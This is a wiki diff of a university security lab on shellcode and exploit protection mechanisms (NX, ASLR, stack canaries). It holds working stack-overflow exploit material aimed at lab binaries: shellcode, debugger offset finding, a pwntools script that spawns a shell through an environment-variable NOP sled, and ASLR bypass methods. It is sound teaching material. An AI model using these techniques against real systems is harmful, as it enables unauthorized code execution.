Show page

Differences

This shows you the differences between two versions of the page.

--- cns:labs:lab-06 [2017/11/12 19:28]
irina.presa [4. Ending with style: pwntools [2p]]
+++ cns:labs:lab-06 [2020/11/16 11:01] (current)
dennis.plosceanu [T1. GCC stack protector [1p]]
@@ Line 1: / Line 1: @@
-====== Lab 06 - Exploiting. Shellcodes ======
+====== Lab 06 - Exploit Protection Mechanisms ======
-===== Resources =====
-  * [[http://shell-storm.org/shellcode/|Shellstorm - A collection of shellcodes]]
+===== Introduction: Protection Mechanisms =====
-  * [[https://trailofbits.github.io/ctf/exploits/README.html|TrailofBits guide to exploiting binaries]]
-  * [[http://security.cs.pub.ro/hexcellents/wiki/|Hexcellents - A collection of binary exploitation resources]]
-===== Lab Support Files =====
+So far we've explored methods of abusing **vulnerabilities** in programs in order to gain control over them, using manual and/or automated techniques known as **exploits**. Ideally, programmers would carefully inspect code to remove all the possible vulnerabilities from their programs; in practice however even the most basic vulnerabilities (e.g. unchecked buffer bounds) can be easily found in the wild, which is how various hardware and software **protection mechanisms** were developed to mitigate attacks. We will study a few of these mechanisms in this lab, and we will find out how we can bypass them under certain scenarios.
-We will use this [[http://elf.cs.pub.ro/oss/res/labs/lab-06.tar.gz|lab archive]] throughout the lab.
+If we relate to the "stack buffer overflow" scenarios we have worked with in the past labs, we know intuitively that we want to stop at least two aspects of attacks:
-Please download the lab archive an then unpack it using the commands below:
+  * The attacker's ability to read/write memory they shouldn't, e.g. code pointers, in particular **return addresses** on the stack, and/or
-<code bash>
+  * The ability to inject **arbitrary code** into the program and execute this arbitrary code (shellcode).
-student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-06.tar.gz
-student@mjolnir:~$ tar xzf lab-06.tar.gz
-</code>
-After unpacking we will get the ''lab-06/'' folder that we will use for the lab:
+We discuss some mitigation techniques in this section.
-<code bash>
+==== Code Integrity Protection ====
-student@mjolnir:~$ cd lab-06/
-student@mjolnir:~/lab-06$ ls
-bin_to_hex.sh  Makefile  shellcode_exit.S  skel_pwn.py  test_shellcode.c  vuln2.asm  vuln.asm
-</code>
-===== Intro =====
+The **code integrity** property is entailed by two principles:
-Whenever an attacker manages to overwrite the return address, his primary follow-up is to divert the execution flow to his advantage. One can gain a stable foothold inside the exploited system via spawning a shell from the vulnerable application.
+  * Arbitrary (non-code) data must be **non-executable**
+  * Code must be **non-writable** (read-only) and executable
-This can be accomplished by injecting code into the application's memory (stack, heap or by other means) and diverting the execution flow to that code. Please note the following prerequisites in order for this to work:
+This mechanism is also known as Data Execution Prevention (DEP) or "Write XOR Execute" (W⊕X).
-  - A vulnerability has to exist. If there is a bug which crashes the application, but cannot be leveraged in any way, then that particular attack path is cut short.
+The two requirements are enforced at various levels. Most modern hardware architectures enforce memory access permissions using virtual memory (paging): for example x86 execution permissions are determined using the **NX** (Non-Executable) bit, while write permissions are determined using the **RW** (Read/Write) bit. The operating system manages page tables, while the access policy is set by the compiler, linker and loader, as previously discussed in [[cns:labs:lab-03|Lab 03]] and [[cns:labs:lab-04|Lab 04]].
-  - The attacker must be able to write the desired code inside the program's memory. This area of memory, apart from being writable, should also be executable, which is extremely rare in today's binaries.
-  - Finally, the injected code should be reached somehow by diverting the execution of the binary towards it.
-Since the injected code's outcome is commonly that of spawning a shell, the name "shellcode" is used to describe a wide array of such code snippets. A "shellcode" could also create a new socket, or read the contents of a file and print it to the standard output.
+For example we can set stack access permissions by configuring the GCC linker via the ''-z'' flag with the ''execstack''/''noexecstack'' parameters:
-<note important>
+<code>
-For this lab, you need to disable ASLR by issuing the following command:
+$ gcc -z noexecstack -o main main.c
+</code>
-<code bash>
+<note>
-echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
+In newer version of GCC ''noexecstack'' is the default policy. Remember that in previous labs we had to explicitly pass ''-z execstack'' to GCC in order to make the stack executable.
-</code>
 </note>
-===== Tutorial [2p] =====
-Let's write a simple shellcode which performs
+<note important>
-<code C>
+**Bypassing code integrity** is possible through //code reuse//. For example if we want to obtain a shell, all we need to do is divert the control-flow to the ''system'' C library function with the ''%%"/bin/sh"%%'' parameter -- this is from a class of attacks known as //return-to-libc//. The fact that the vast majority of programs are linked with the C library makes this pretty easy.
-exit(1337);
-</code>
-==== Phase 1: Recon ====
+In general we can reuse existing code in the program to do what is known as //Return-Oriented Programming// (ROP). ROP is a very powerful technique: it was shown that the attacker may reuse small pieces of program code called "gadgets" to execute arbitrary (turing-complete) operations! We will study ROP further in the upcoming labs.
+</note>
-We have the following blatantly vulnerable program:
+<note important>
+**Bypassing code integrity (2)**: while ''-z noexecstack'' will ensure that the stack memory area is set as non-executable by the loader, this doesn't rule out the possibility for an attacker to make it executable at run-time! e.g. by calling ''mprotect''.
+</note>
+==== Address Space Layout Randomization ====
-<code asm>
+So far we've seen that it's pretty easy to obtain the approximate or exact address of a memory location (e.g. buffer) by assuming it was leaked (through a ''printf'') or by looking in GDB. The technique known as //Address Space Layout Randomization// (ASLR) works by trying to remove this information from the attacker: it sets as many program segments as possible to **randomly chosen** addresses, thus providing a level of **probabilistic protection**.
-extern gets
-extern printf
-section .data
+On x86 it is possible to randomize the following segments:
-formatstr: db "Enjoy your leak: %p",0xa,0
-section .text
+  * The **stack** is easily randomizable, as all stack addresses are relative to ''esp'' or ''ebp''
-global main
+  * **Global data** may be randomized, if e.g. the data segment is set to a random value
-main:
+  * **Code** can only be randomized by compiling the program as Position Independent Code/Position Independent Executable; this is the default for shared libraries, but otherwise executable code is usually placed at fixed addresses
-	push ebp
-	mov ebp, esp
-	sub esp, 64
-	lea ebx, [ebp - 64]
-	push ebx
-	push formatstr
-	call printf
-	push ebx
-	call gets
-	add esp, 4
-	leave
-	ret
-</code>
-You may already see what the vulnerability consists of.
+Note that randomization occurs at **load-time**, which means that the segment addresses **do not** change while the process is running.
-==== Phase 2: Finding the vulnerability ====
+<note important>
+**Bypassing ASLR** is possible through at least one of the following methods, some of which we will employ throughout the lab.
-We are going to use some of PEDA's features to our advantage:
+**Bruteforce**. If the attacker is able to inject payloads multiple times without crashing the application, they can bruteforce the address they are interested in (e.g., a target in libc). Otherwise, they can just run the exploit multiple times until they guess the correct target.
-<code asm>
+**NOP sled**. In the case of shellcodes, a longer NOP sled will maximize the chances of jumping inside it and eventually reaching the exploit code even if the stack address is randomized.
-gdb-peda$ pattc 100 # Generate a De Bruijn pattern of length 100
-'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
-gdb-peda$ r
-Starting program: /vuln
-AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
-Program received signal SIGSEGV, Segmentation fault.
+**Restrict entropy**. There are various ways of reducing the entropy of the randomized address. For example, the attacker can decrease the initial stack size by setting a huge amount of dummy environment variables.
- [----------------------------------registers-----------------------------------]
+**Information leak**. The most effective way of bypassing ASLR is by using an information leak vulnerability that exposes a randomized address, or at least parts of it. The attacker can also dump parts of libraries (e.g., libc) if they are able to create an exploit that reads them. This is useful in remote attacks to infer the version of the library, downloading it from the web, and thus knowing the right GOT offsets for other functions (not originally linked with the binary).
-EAX: 0xfff088f8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
+</note>
-EBX: 0xfff088f8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-ECX: 0xf77495a0 --> 0xfbad2288
-EDX: 0xf774a87c --> 0x0
-ESI: 0xf7749000 --> 0x1aedb0
-EDI: 0xf7749000 --> 0x1aedb0
-EBP: 0x41644141 ('AAdA')
-ESP: 0xfff08940 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-EIP: 0x41413341 ('A3AA')
-EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
-[-------------------------------------code-------------------------------------]
-Invalid $PC address: 0x41413341
-[------------------------------------stack-------------------------------------]
-| 0xfff08940 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xfff08944 ("AA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xfff08948 ("AJAAfAA5AAKAAgAA6AAL")
-| 0xfff0894c ("fAA5AAKAAgAA6AAL")
-| 0xfff08950 ("AAKAAgAA6AAL")
-| 0xfff08954 ("AgAA6AAL")
-| 0xfff08958 ("6AAL")
-| 0xfff0895c --> 0xf779ac00 --> 0x1
-[------------------------------------------------------------------------------]
-Legend: code, data, rodata, value
-Stopped reason: SIGSEGV
-x41413341 in ?? ()
-gdb-peda$ patto A3AA # Find offset within pattern
-A3AA found at offset: 68
-</code>
-Notice that the program crashed. We can quickly determine that the program tried to return to **0x41413341**, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group "A3AA" found at offset 68 in the pattern. This offset is where the return address is situated relative to our input.
+<note>
+Linux allows 3 options for its ASLR implementation that can be configured using the ''/proc/sys/kernel/randomize_va_space'' file. Writing 0, 1, or 2 to this will results in the following behaviors:
-==== Phase 3: Reliable crash ====
+  * **0**: deactivated
+  * **1**: random stack, vdso, libraries; data is after code section
+  * **2**: random data too
+</note>
-Now that we know the offset from the beginning of the buffer (and also, our input) as being 68, we can attempt to reliably crash the program to a destination of our choice. Let's try having **'BBBB'** as our return address, or **0x42424242**, preceded by 68 'A's.
+<note important>
+ASLR is by default disabled within GDB PEDA. To turn ASLR on in GDB PEDA run:
+<code>
+gdb-peda$ aslr on
+</code>
+Or, in GDB (non-PEDA) run:
+<code>
+(gdb) set disable-randomization off
+</code>
-We can construct this test sequence using python from the command line:
+To check the ASLR status in GDB PEDA run:
-<code bash>
+<code>
-python -c "print 'A'*68 + 'BBBB'"
+gdb-peda$ aslr
 </code>
-We can now rerun the binary under gdb and see what happens.
+To check the ASLR status in GDB run:
+<code>
+(gdb) show disable-randomization
+</code>
+</note>
+==== Stack Protection: Canaries ====
-<code asm>
+Assuming we have a program ''p'' that is vulnerable to a stack-based buffer overflow in function ''f'', the program flow will normally be the following:
-gdb-peda$ r
-Starting program: /vuln
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
-Program received signal SIGSEGV, Segmentation fault.
+  - Caller calls ''f'': return address ''ret'' is pushed on the stack
+  - ''f'' executes: the attacker can overflow a buffer and overwrite ''ret''
+  - Callee returns from ''f'' to potentially modified ''ret''
- [----------------------------------registers-----------------------------------]
+The compiler or the programmer can easily provide some protection by inserting a special value (unknown to the attacker) between the buffer and the return address. This value is known as a **canary**. The figure below illustrates its placement on the stack:
-EAX: 0xffb0e678 ('A' <repeats 68 times>, "BBBB")
-EBX: 0xffb0e678 ('A' <repeats 68 times>, "BBBB")
-ECX: 0xf77905a0 --> 0xfbad2288
-EDX: 0xf779187c --> 0x0
-ESI: 0xf7790000 --> 0x1aedb0
-EDI: 0xf7790000 --> 0x1aedb0
-EBP: 0x41414141 ('AAAA')
-ESP: 0xffb0e6c0 --> 0x0
-EIP: 0x42424242 ('BBBB')
-EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
-[-------------------------------------code-------------------------------------]
-Invalid $PC address: 0x42424242
-[------------------------------------stack-------------------------------------]
-| 0xffb0e6c0 --> 0x0
-| 0xffb0e6c4 --> 0xffb0e754 --> 0xffb1018e ("/vuln")
-| 0xffb0e6c8 --> 0xffb0e75c --> 0xffb101c0 ("LC_PAPER=ro_RO.UTF-8")
-| 0xffb0e6cc --> 0x0
-| 0xffb0e6d0 --> 0x0
-| 0xffb0e6d4 --> 0x0
-| 0xffb0e6d8 --> 0xf7790000 --> 0x1aedb0
-| 0xffb0e6dc --> 0xf77e1c04 --> 0x0
-[------------------------------------------------------------------------------]
-Legend: code, data, rodata, value
-Stopped reason: SIGSEGV
-x42424242 in ?? ()
-</code>
-Excellent!
+{{ :cns:labs:stack_canary_illustration.png?nolink&500 |}}
-==== Phase 4: Writing the shellcode ====
+Thus the program logic becomes:
-Shellcode is typically written in assembly, due to memory constraints.
+  - Caller calls ''f'': return address ''ret'' is pushed on the stack
+  - Callee pushes a random value ''v'' on the stack and writes it somewhere else for reference
+  - ''f'' executes: the attacker can overflow a buffer and overwrite ''ret''
+  - Callee returns from ''f'': the value of ''v'' is checked; if it has changed, abort, otherwise return to ''ret''
-How do we start writing our //exit// shellcode? First, we need to know how system calls are performed on our target platform (x86 in our case).
+Canary values can be enabled [[http://wiki.osdev.org/Stack_Smashing_Protector|in GCC]] through the ''-fstack-protector'' set of flags. We will examine its usage in the tutorial section of this lab.
-Each system call has a specific number which identifies it. This number must be stored in EAX. Next, the arguments of the system call are placed in EBX, ECX, EDX, ESI, EDI, in this order. A special software interrupt is used to issue the actual system call, **int 0x80**.
+<note important>
+**Bypassing stack canaries**. We make the following observations:
-Consult the Linux x32 ABI [[http://security.cs.pub.ro/hexcellents/wiki/kb/exploiting/linux_abi_x32|here]]
+  * Stack canaries only protect against //buffer overflows//. Arbitrary memory writes (e.g. to offsets that can be controlled by the attacker) may be crafted so that they do not touch the canary value.
+  * Stack canaries are vulnerable to the same set of attacks as ASLR. Guessing the canary value, e.g. through an information leak or through brute force, is possible and will bypass the attack. Modifying the reference value is also (at least theoretically) possible (the value may be held [[http://wiki.osdev.org/Stack_Smashing_Protector#Implementation|in a global variable]], in which case the attacker regains complete control of the stack).
+</note>
+===== Tutorials =====
-We need to place **1** (exit's system call number) in EAX, and the value of exit's single argument in EBX.
+All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]].
-Our shellcode will look as follows:
+==== T1. GCC stack protector ====
-<code asm>
+Take a look at ''vulnerable.c'' in the [[http://elf.cs.pub.ro/oss/res/labs/lab-06.tar.gz|lab archive]]. We are interested in particular in the ''%%get_user_input%%'' function, which ''read''s from standard input into a local buffer more bytes than are available:
-BITS 32
-mov eax, 1
+<code C>
-mov ebx, 1337
+void get_user_input(void)
-int 0x80
+{
+	char buf[BUFFER_SIZE];
+	read(STDIN_FILENO, buf, 8*BUFFER_SIZE);
+}
 </code>
-But we can't pass it as assembly instructions to the application; we need to assemble it into binary as well.
+We can overflow ''buf'' into ''%%get_user_input%%'''s return address and obtain control of the program, using the three-step approach studied in the previous labs:
-<code bash>
+  - Input a large input string that crashes the process
-nasm shellcode_exit.S -o shell.bin
+  - Determine the offset into the string that overwrites the return address
+  - Determine the address where to jump, e.g. a fixed function or a shellcode placed on the stack
+For now we're only interested in the first step. Let's compile ''vulnerable'' and provide it an arbitrary payload:
+<code>
+$ make vulnerable
+cc -m32 -c -m32 -Wall -Wextra -Wno-unused-function -Wno-unused-variable -g -O0 -fno-stack-protector -o vulnerable.o vulnerable.c
+cc -m32 -z execstack  vulnerable.o   -o vulnerable
+$ python -c 'print("A"*20)' | ./vulnerable
+Segmentation fault
+$ dmesg | tail -n 1
+[14935.316385] vulnerable[29090]: segfault at 41414141 ip 0000000041414141 sp 00000000ffcd9880 error 14 in libc-2.24.so[f753b000+1b1000]
 </code>
-We now need this binary code as a stream of hex values in order to use python/perl/echo to feed it into the application.
+We can thwart the attack in this phase by building our binary with the ''-fstack-protector-all'' flag, which ensures that the stack canary instrumentation will be applied to all the functions. The Makefile can be used to compile this into ''vulnerable-ssp'':
-<code bash>
+<code>
-hexdump -v -e '1/1 "\\"' -e '1/1 "x%02x"' shell.bin ; echo
+$ make vulnerable-ssp
+cc -m32 -c -m32 -Wall -Wextra -Wno-unused-function -Wno-unused-variable -g -O0 -fstack-protector-all -o vulnerable-ssp.o vulnerable.c
+cc -m32 -z execstack  vulnerable-ssp.o   -o vulnerable-ssp
 </code>
-or
+Now let's try to inject the payload again:
-<code bash>
+<code>
-xxd -c 1 -p shell.bin | awk '{ print "\\x" $0 }' | paste -sd ""
+$ python -c 'print("A"*20)' | ./vulnerable-ssp
+*** stack smashing detected ***: ./vulnerable-ssp terminated
+======= Backtrace: =========
+/lib/i386-linux-gnu/libc.so.6(+0x6733a)[0xf762f33a]
+/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xf76bfd27]
+/lib/i386-linux-gnu/libc.so.6(+0xf7ce8)[0xf76bfce8]
+./vulnerable-ssp[0x80484a1]
+./vulnerable-ssp[0x804840a]
+======= Memory map: ========
 </code>
-or just use the conveniently supplied **bin_to_hex.sh** script.
+We observe that the GCC stack protector run-time detected our attempt to smash the stack and aborted the program.
+/*
+<note important>
+Try injecting payloads of various sizes (e.g. 20, 24, 16 bytes) and see what happens. In some cases, the program does a segmentation fault before it gets to print the backtrace. Why is that?
+</note>
+*/
+==== T2. Recap: injecting the shellcode using environment variables  ====
-In order to test your shellcode, you can use **xxd** to export the shellcode as a C array and test it using the **test_shellcode** program in the archive.
+Let's try to exploit ''vulnerable'', assuming that both the stack protector and ASLR are disabled. We make sure to disable ASLR using:
-<code bash>
+<code>
-xxd -i shell.bin > shellcode
+$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
 </code>
-By running **test_shellcode** under **strace**, you can check to see exactly if the system call was performed, and with which arguments. If all else fails, **gdb**.
+For now let's use GDB to find where we need to place the return address in our input:
-<code bash>
+<code asm>
-strace -e exit ./test_shellcode
+$ gdb -q ./vulnerable
-strace: [ Process PID=5155 runs in 32 bit mode. ]
+Reading symbols from ./vulnerable...done.
-exit(1337)                              = ?
+gdb-peda$ pattc 100
-+++ exited with 57 +++
+'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
+gdb-peda$ r < <(echo 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL')
+...
+EIP: 0x41434141 ('AACA')
+...
+Legend: code, data, rodata, value
+Stopped reason: SIGSEGV
+x41434141 in ?? ()
+gdb-peda$ patto AACA
+AACA found at offset: 16
 </code>
-==== Phase 5: Placing the shellcode ====
+We now know that the return address is found at offset 16 from the buffer's start. While this is good enough for us, one issue is that the buffer is a bit too small to hold a shellcode. So to make our life easy, let's use the ''SHELLCODE'' environment variable to hold the shellcode.
-Use the supplied **bin_to_hex.sh** script to convert a binary file to a hex representation. You can also do one final view of the shellcode using **objdump**:
+<note important>
+Remember that environment variables are placed on the stack, along with ''argv''. It doesn't really matter whether the victim program will use that variable or not, the OS will place it there anyway and it can be used to inject malicious code or data.
+</note>
+Now let's try to find the approximate address at which the shellcode is placed -- remember that we turned ASLR off, so even if the environment changes a little, we can still make a good guess using GDB.
 <code asm>
-objdump -D -b binary -M intel -m i386 shell.bin
+$ SHELLCODE=$(python -c 'print("C" * 1000)') gdb -q ./vulnerable
-shell.bin:     file format binary
+Reading symbols from ./vulnerable...done.
+gdb-peda$ r < <(python -c 'print("A" * 16 + "BBBB")')
+...
+RBP: 0x4141414141414141 ('AAAAAAAA')
+...
+Legend: code, data, rodata, value
+Stopped reason: SIGSEGV
+x42424242 in ?? ()
+gdb-peda$ searchmem "CCCCC"
+Searching for 'CCCCC' in: None ranges
+Found 200 results, display max 200 items:
+[stack] : 0x7fffffffeba4 ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffeba9 ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffebae ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffebb3 ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffebb8 ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffebbd ('C' <repeats 200 times>...)
+[stack] : 0x7fffffffebc2 ('C' <repeats 200 times>...)
+...
+</code>
-Disassembly of section .data:
+Thus so far we know that:
-00000000 <.data>:
+  * The return address is at offset 16 in our input
-:	b8 01 00 00 00       	mov    eax,0x1
+  * The ''SHELLCODE'' environment variable will be placed at approximately ''0x7fffffffeba4''. We expect this to vary quite a bit though, as the process running under GDB uses a different environment that affects stack addresses (environment variables are also stored on the stack). Moreover, the address will be different when running it under different systems.
-:	bb 39 05 00 00       	mov    ebx,0x539
-   a:	cd 80                	int    0x80
-</code>
-First, let's determine the length of our shellcode:
+Given this, we can already write a skeleton for our exploit:
-<code bash>
+<code python exploit-t2.py>
-python -c "print len('$(./bin_to_hex.sh shell.bin)')"
+#!/usr/bin/env python
-</code>
-Next, we'll need to fill our buffer up to 68 characters until the saved return address is reached on the stack.
+from pwn import *
-<code bash>
+context.binary = "./vulnerable"
-python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(68-12)"
-</code>
-==== Phase 6: Diverting control flow ====
+# Generate vars: a shellcode, return address offset, target address.
+shellcode = asm(shellcraft.sh())
+ret_offset = 16
+target = 0x7fffffffeba4
-Now we need to find the beginning of our buffer on the stack in order to return to it. Repeat the experiment and set a breakpoint at the **leave** instruction. Write down the address of the beginning of your buffer on the stack, cause that's where the shellcode will end up.
+# Generate process, with SHELLCODE as an env var.
+io = process('./vulnerable', env= { 'SHELLCODE' : shellcode })
-<code asm>
+# Craft payload.
-gdb-peda$ b *0x8048422
+payload = b"A" * ret_offset
-Breakpoint 1 at 0x8048422
+payload += pack(target)
-gdb-peda$ r
-Starting program: /vuln
-AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
- [----------------------------------registers-----------------------------------]
+# Send payload.
-EAX: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
+io.sendline(payload)
-EBX: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-ECX: 0xf7fac5a0 --> 0xfbad2288
-EDX: 0xf7fad87c --> 0x0
-ESI: 0xf7fac000 --> 0x1aedb0
-EDI: 0xf7fac000 --> 0x1aedb0
-EBP: 0xffffcef8 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-ESP: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-EIP: 0x8048422 (<main+18>:	leave)
-EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
-[-------------------------------------code-------------------------------------]
-x8048419 <main+9>:	push   ebx
-x804841a <main+10>:	call   0x80482e0 <gets@plt>
-x804841f <main+15>:	add    esp,0x4
-=> 0x8048422 <main+18>:	leave
-x8048423 <main+19>:	ret
-x8048424 <main+20>:	xchg   ax,ax
-x8048426 <main+22>:	xchg   ax,ax
-x8048428 <main+24>:	xchg   ax,ax
-[------------------------------------stack-------------------------------------]
-| 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffcebc ("AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffcec0 ("ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffcec4 ("$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffcec8 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffcecc ("A-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffced0 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-| 0xffffced4 ("AA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
-[------------------------------------------------------------------------------]
-Legend: code, data, rodata, value
-Breakpoint 1, 0x08048422 in main ()
+io.interactive()
 </code>
-<code bash>
+Let's try to run ''exploit-t2.py'':
-python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(68-12) + '\xb8\xce\xff\xff'" > payload
+<code>
+$ python exploit-t2.py
+[+] Starting local process './vulnerable': Done
+[*] Switching to interactive mode
+[*] Got EOF while reading in interactive
+$ ls /
+[*] Process './vulnerable' stopped with exit code -11
+[*] Got EOF while sending in interactive
 </code>
-Now test the payload in gdb! Break at **ret** and see the control flow continuing on the stack and executing exit.
+This most probably crashed the program. Indeed, if we look at ''dmesg'', we will see something along the lines of:
-Then try running the experiment outside of gdb. Does it still work? Why or why not?
+<code>
+$ dmesg | tail
+[31758.336503] vulnerable[53539]: segfault at 15 ip 00007fffffffeb9a sp 00007fffffffed30 error
+
+</code>
-In order to circumvent frustration, we've leaked the stack address of the buffer in the binary.
+So we don't know //exactly// what happened((We can decode the error code using information in the [[http://lxr.free-electrons.com/source/arch/x86/mm/fault.c#L30|Linux kernel source code]]. Error code ''6'' corresponds to a failed user space write operation, but that doesn't help much.)), but we know that most probably the code at ''0x7fffffffeba4'' isn't what we expected. Since finding the exact address is difficult in the absence of an information leak, we could just extend our shellcode by prepending a **NOP sled** to it:
-===== Tips & Tricks =====
+<code python>
+nopsled = b"\x90" * 2000
+io = process('./vulnerable', env= { 'SHELLCODE' : nopsled + shellcode })
+target = io.corefile.env["SHELLCODE"]
-==== Loop forever ====
+# Craft payload.
+payload = b"A" * ret_offset
+payload += pack(target)
-Sometimes, you won't have access to the binary and only have a leaked address of some description. You can add this instruction in your shellcode
+</code>
-<code asm>
+Running this gives us a shell:
-jmp 0x0
+<code>
+$ python exploit-t2.py
+[+] Starting local process './vulnerable': Done
+[*] Switching to interactive mode
+$ ls /
+bin   home          lib32      media  root  sys  vmlinuz
+boot  initrd.img      lib64      mnt     run   tmp  vmlinuz.old
+dev   initrd.img.old  libx32      opt     sbin  usr
+etc   lib          lost+found  proc     srv   var
+$
 </code>
-and vary the overwritten return address. If the program stops responding, then it means that it has reached your shellcode.
-==== NOP sled ====
-Stack addresses aren't always stable. To circumvent is, buffer space permitting, you can inject a large number of 'nop' instructions (no operation) prior to the actual shellcode. In this way, if you return to any of the injected nop instructions, the execution flow will reach your shellcode. To better illustrate:
+===== Tasks =====
-{{http://photos1.blogger.com/blogger/1619/2480/1600/buffer_over5.jpg}}
+==== 1. Brute-force ASLR bypass  ====
-==== Keeping stdin open ====
+First, make sure ASLR is enabled:
-Your exploit may spawn a shell, and yet it shuts off instantly. That's because the newly spawned shell isn't waiting on any input. A workaround to this problem is to append **stdin** to the payload, as follows:
+<code>
+$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
+
+</code>
+**The task** is to upgrade the exploitation script to **brute-force ASLR**. Take a look at the tips below if you get stuck.
+<note tip>
+Bypassing ASLR through brute-force is possible only because ''bruteforce'' is a 32-bit binary, although this technique is technically speaking possible on 64-bit if the attacker can leak //address bits//. The key question to ask here is, **how many bits of entropy** does ASLR yield on our architecture?
+We can find the answer quickly through empirical means. We've included a program called ''buf.c'' in the [[http://elf.cs.pub.ro/oss/res/labs/lab-06.tar.gz|lab archive]], which intentionally leaks a stack address. Let's compile it and give it a few runs:
-<code bash>
+<code>
-cat payload - | ./vuln
+$ make buf
+...
+$ for i in $(seq 1 20); do ./buf; done
+xff98382c
+xffa79b0c
+xfffc01bc
+xfff26d5c
+xffaa8cfc
+xffa6c58c
+xffb05dec
+xff8578bc
+xff84554c
+xffa9d39c
+xffb61d5c
+xffb76cfc
+xffb5363c
+xff9c4edc
+xffc8a29c
+xffa956dc
+xffe8d0cc
+xff9b024c
+xffc2b93c
+xffa579cc
 </code>
-In this way, after the shell spawns, you can interact with it.
+Looking at the addresses below (btw, remember the memory dump analysis task from [[cns:labs:lab-03|Lab 03]]?), we can see that the //most significant byte// is always ''0xff'', while  the //least significant nibble// (4-bit value) is always ''0xc''. This means 12 address bits are fixed, which leaves us with ''32 - 12 = 20'' address bits.
-===== Tasks =====
+/*
-==== 1. write [2p] ====
+So filling the stack with a payload which is ''2^20 = 1MB'' in size should in theory guarantee us that our attack is reliable. In practice this is not so easy, because
-Using the same vulnerable binary, write a shellcode which performs the following:
+*/
-<code C>
-write(1, "Hello World!\n", 13);
+The total size of the environment variables is limited by ''%%ARG_MAX%%'' (also see the "Limits on size of arguments and environment" section in the [[http://man7.org/linux/man-pages/man2/execve.2.html|execve manpage]]):
+<code>
+$ getconf ARG_MAX
+2097152
 </code>
-Again, inspect the Linux x86 ABI.
